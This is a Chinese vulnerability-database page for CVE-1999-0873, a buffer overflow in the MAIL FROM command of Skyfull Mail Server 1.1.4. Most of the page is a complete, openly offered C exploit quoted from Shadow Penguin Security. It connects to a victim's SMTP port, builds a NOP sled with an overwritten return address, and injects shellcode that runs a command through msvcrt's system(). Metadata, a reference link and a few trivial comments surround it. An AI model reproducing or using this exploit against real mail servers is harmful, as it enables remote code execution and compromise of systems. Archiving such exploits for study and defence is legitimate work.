Skyfull邮件服务器 MAIL FROM缓冲区溢出漏洞
漏洞ID | 1105583 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 1999-10-30 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-1999-0873 |
CNNVD-ID | CNNVD-199910-055 |
漏洞平台 | Windows | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
Skyfull邮件服务器存在缓冲区溢出漏洞。可以借助MAILFROM指令导致该漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/759/info
The Skyfull mail server version 1.1.4 has an unchecked buffer into which the argument from the MAIL FROM command is placed. This buffer can be overwritten and arbitrary code can be executed.
/*=============================================================================
Skyfull Mail Server Version 1.1.4 Exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN ([email protected])
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
#define MAXBUF 3000
#define RETADR 655
#define JMPADR 651
#define SMTP_PORT 25
#define JMPEAX_ADR 0xbfe0a035
unsigned char exploit_code[200]={
0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
0xFF,0x00
};
unsigned char cmdbuf[200]="msvcrt.dll.system.welcome.exe";
main(int argc,char *argv[])
{
SOCKET sock;
SOCKADDR_IN addr;
WSADATA wsa;
WORD wVersionRequested;
unsigned int ip,p1,p2;
static unsigned char buf[MAXBUF],packetbuf[MAXBUF+1000];
struct hostent *hs;
if (argc<2){
printf("usage: %s VictimHostn",argv[0]); return -1;
}
wVersionRequested = MAKEWORD( 2, 0 );
if (WSAStartup(wVersionRequested , &wsa)!=0){
printf("Winsock Initialization failed.n"); return -1;
}
if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
printf("Can not create socket.n"); return -1;
}
addr.sin_family = AF_INET;
addr.sin_port = htons((u_short)SMTP_PORT);
if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.n"); return -1;
}
addr.sin_family = hs->h_addrtype;
memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){
printf("Can not connect to specified host.n"); return -1;
}
recv(sock,packetbuf,MAXBUF,0);
printf("BANNER FROM "%s" : %sn",argv[1],packetbuf);
memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
ip=JMPEAX_ADR;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[JMPADR ]=0xeb;
buf[JMPADR+1]=0x80;
strcat(exploit_code,cmdbuf);
p1=(unsigned int)LoadLibrary;
p2=(unsigned int)GetProcAddress;
exploit_code[0x0d]=p1&0xff;
exploit_code[0x0e]=(p1>>8)&0xff;
exploit_code[0x0f]=(p1>>16)&0xff;
exploit_code[0x10]=(p1>>24)&0xff;
exploit_code[0x1e]=p2&0xff;
exploit_code[0x1f]=(p2>>8)&0xff;
exploit_code[0x20]=(p2>>16)&0xff;
exploit_code[0x21]=(p2>>24)&0xff;
memcpy(buf+JMPADR-strlen(exploit_code)-1,exploit_code,strlen(exploit_code));
sprintf(packetbuf,"HELO UNYUNn");
send(sock,packetbuf,strlen(packetbuf),0);
recv(sock,packetbuf,MAXBUF,0);
printf("HELO: Reply from "%s" : %sn",argv[1],packetbuf);
sprintf(packetbuf,"MAIL FROM: UNYUN <%[email protected]>rn",buf);
send(sock,packetbuf,strlen(packetbuf),0);
closesocket(sock);
printf("Done.n");
return FALSE;
}
|参考资料
来源:BID
名称:759
链接:http://www.securityfocus.com/bid/759
相关推荐: ntop Remote Format String Vulnerability
ntop Remote Format String Vulnerability 漏洞ID 1102370 漏洞类型 Input Validation Error 发布时间 2002-02-28 更新时间 2002-02-28 CVE编号 N/A CNNVD-I…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666